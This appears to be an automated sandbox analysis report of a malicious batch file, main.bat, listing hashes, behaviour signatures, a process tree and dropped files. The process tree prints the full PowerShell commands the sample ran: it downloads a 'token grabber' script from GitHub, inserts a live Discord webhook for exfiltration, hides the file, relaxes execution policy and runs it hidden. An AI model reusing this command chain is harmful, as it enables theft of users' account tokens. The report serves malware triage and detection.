Overview

overview

10

Static

static

1

main.bat

windows7-x64

1

main.bat

windows10-2004-x64

10

Resubmissions

23/02/2024, 02:26

240223-cw8fbaaa2x 10

23/02/2024, 02:21

240223-cs7dvaae27 10

Analysis

  • max time kernel
    98s
  • max time network
    117s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/02/2024, 02:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    main.bat

  • Size

    1021B

  • MD5

    2af9fa8f11372ee57de3a24d8194e933

  • SHA1

    d762d1f8f41d945bed6ede83e0849abe72c45ead

  • SHA256

    a08fbdb03519aba94086698e6b0dfff6ecaf6a1898947319d807c039c8847156

  • SHA512

    a7f86397bb7d1feab2e8c42ffc7b164a0268d619a4cc8058af1d4b4cf61582f0efdae61bf2e292096f4fe2c17cee0913918fb3c866e4f7df81b48a5d7d66377d

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://discord.com/api/webhooks/1210399637668888596/sq9DmWnxKx2Vge5EqmBBpL4Aiwl-hN_Dl0SLT0SDUAgRwBDBJETln7hznNqAh7pHoi4V

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4700
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4588
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:3588
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1210399637668888596/sq9DmWnxKx2Vge5EqmBBpL4Aiwl-hN_Dl0SLT0SDUAgRwBDBJETln7hznNqAh7pHoi4V' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1620
      • C:\Windows\system32\attrib.exe
        attrib +h +s powershell123.ps1
        2⤵
        • Views/modifies file attributes
        PID:2052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4072
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3000
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2qvycdw4\2qvycdw4.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3060
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FCA.tmp" "c:\Users\Admin\AppData\Local\Temp\2qvycdw4\CSCE484F7FDFEF0456EA16417385E4B4821.TMP"
            4⤵
              PID:3772
        • C:\Windows\system32\attrib.exe
          attrib -h -s powershell123.ps1
          2⤵
          • Views/modifies file attributes
          PID:5016
        • C:\Windows\system32\timeout.exe
          timeout 3
          2⤵
          • Delays execution with timeout.exe
          PID:3628
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:2904
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
          1⤵
            PID:3408

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            2f57fde6b33e89a63cf0dfdd6e60a351

            SHA1

            445bf1b07223a04f8a159581a3d37d630273010f

            SHA256

            3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

            SHA512

            42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b66db53846de4860ca72a3e59b38c544

            SHA1

            2202dc88e9cddea92df4f4e8d83930efd98c9c5a

            SHA256

            b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

            SHA512

            72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            64B

            MD5

            085ca41702c77aa56e11bbd29a7541cd

            SHA1

            c2ee76236051339616b5e37e3913637716fada62

            SHA256

            e19e64e3001c78a770496aab33bf771fda0ef38cceaaf980921110babe830205

            SHA512

            b7a47d1f7200d7e7c6a05e499d176a5fc746f9f8d7a07455f0b198e5d2ec56b0d831d8c54213140bb57e07c417b5c56301d62ffe6b641d2f5afa33e48ef80be1

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\2qvycdw4\2qvycdw4.dll
            Filesize

            3KB

            MD5

            8df4489eafbefb1a32c6efca88582e85

            SHA1

            5307d75ead070d41ec4623744f06c5e520d459ed

            SHA256

            aff36f9f6f67a726c699667f6cd6bcac44507cf180c5cc50dd556d08d9630e80

            SHA512

            e264eacb3be7b24bf48d50401fcc2be3f09eb48344a190fc22cb9a1ec9eabc1c1b17bd01d1830e0de5e95266c547cbcec95b7e40a1781b3c7f5e4bfe1a540607

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\RES9FCA.tmp
            Filesize

            1KB

            MD5

            897ec66bac9a30aa7dc42ed973e125a9

            SHA1

            5ae18e4b0ef2a0d06288cae802f1b8a5aa3f9d30

            SHA256

            b1ea75995ea88baac572448a4f187eaf59eba3009f4188c7c52fac9356b8cdc6

            SHA512

            ae9e28ef6456fb2043e974b929e05f28afd660bc3a4febc6f83c1b34c914a4f118c09577ed07f18266075c4e524f56cb7942fb8d87b6d0965ee15b3b999e1f2e

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgk42c1f.z12.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\powershell123.ps1
            Filesize

            46KB

            MD5

            b7ac61df622db1f81e37f31123637366

            SHA1

            b338853465d12656f5b05c01f277528e1faf089f

            SHA256

            e29ece70e76536d07c33fefca15c98912012887bcf8bf915d551ebf3e91cb3d0

            SHA512

            3335830de362999eb8735f21b97a8ed864108c37c44d4c8fcf158359b44ed9dd75f4f7c0599b9d6b2061a343a4a5127203e21da1b8502c673444207469096e92

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\2qvycdw4\2qvycdw4.0.cs
            Filesize

            336B

            MD5

            016136b12c8022e3155820dd8811cf72

            SHA1

            27dc5ae36badef983dbda987bdb4c584659433b6

            SHA256

            363bc109def451724e5a8fa71b8598e7cd1ea4994622407006def7b2f67dfc56

            SHA512

            7055a3c610cc797f009cf7bce08febe6d90394736e86c8f4a0f13ee5b9b213649d0c0ce1288199f2aa6c38730b119c751233793f53f694badef0f577deb53c43

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\2qvycdw4\2qvycdw4.cmdline
            Filesize

            369B

            MD5

            09fedad742bad828bf0323547ceba7f1

            SHA1

            6d428636a036aeb3e0c812dcb064507641d9baa2

            SHA256

            105a51dd3c3e5d29ad6470f716a2081045543bbe6fbf1cadcbbc833c206ee4c1

            SHA512

            45bdabac50b3dc649de94dd7a776e5fce84f03addb32de37aabe81f30105b08ea778ea018b9c864d6afa082cfa75f2f00d5e98cc67ee82047c46bae0e92bb84e

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\2qvycdw4\CSCE484F7FDFEF0456EA16417385E4B4821.TMP
            Filesize

            652B

            MD5

            727497217b4205f864585bf263dda9d7

            SHA1

            48f094b9471c80ca3cf4dd8970ea359fe352823b

            SHA256

            41d8d34b3fa11fbad118d6b0dbc61f8b3c8d0bcc3685bf9cf531cc86af5d7eb6

            SHA512

            ad6c004b6a41489f6b4112a54915db821b4f46e1cc9770b78e4f4dd5b8cf2230fc7bfcf5c47faf57a34a475ee19bee297c61b0e10c9a668851ccabb9684db613

            Download Submit

          • memory/1620-17-0x00007FF8CF4B0000-0x00007FF8CFF71000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1620-5-0x000002321D670000-0x000002321D692000-memory.dmp

            Filesize

            136KB

            Download

          • memory/1620-10-0x00007FF8CF4B0000-0x00007FF8CFF71000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1620-12-0x000002321BDD0000-0x000002321BDE0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1620-11-0x000002321BDD0000-0x000002321BDE0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1620-13-0x000002321BDD0000-0x000002321BDE0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3000-48-0x000002A6EE540000-0x000002A6EE550000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3000-36-0x00007FF8CF4B0000-0x00007FF8CFF71000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3000-37-0x000002A6EE540000-0x000002A6EE550000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3000-61-0x000002A6EF1A0000-0x000002A6EF1A8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/3000-63-0x000002A6EF430000-0x000002A6EF474000-memory.dmp

            Filesize

            272KB

            Download

          • memory/3000-64-0x000002A6EF500000-0x000002A6EF576000-memory.dmp

            Filesize

            472KB

            Download

          • memory/3000-66-0x00007FF8CF4B0000-0x00007FF8CFF71000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4072-21-0x000001457B2E0000-0x000001457B2F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4072-35-0x00007FF8CF4B0000-0x00007FF8CFF71000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4072-20-0x00007FF8CF4B0000-0x00007FF8CFF71000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4072-33-0x000001457B2E0000-0x000001457B2F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4072-31-0x000001457B2E0000-0x000001457B2F0000-memory.dmp

            Filesize

            64KB

            Download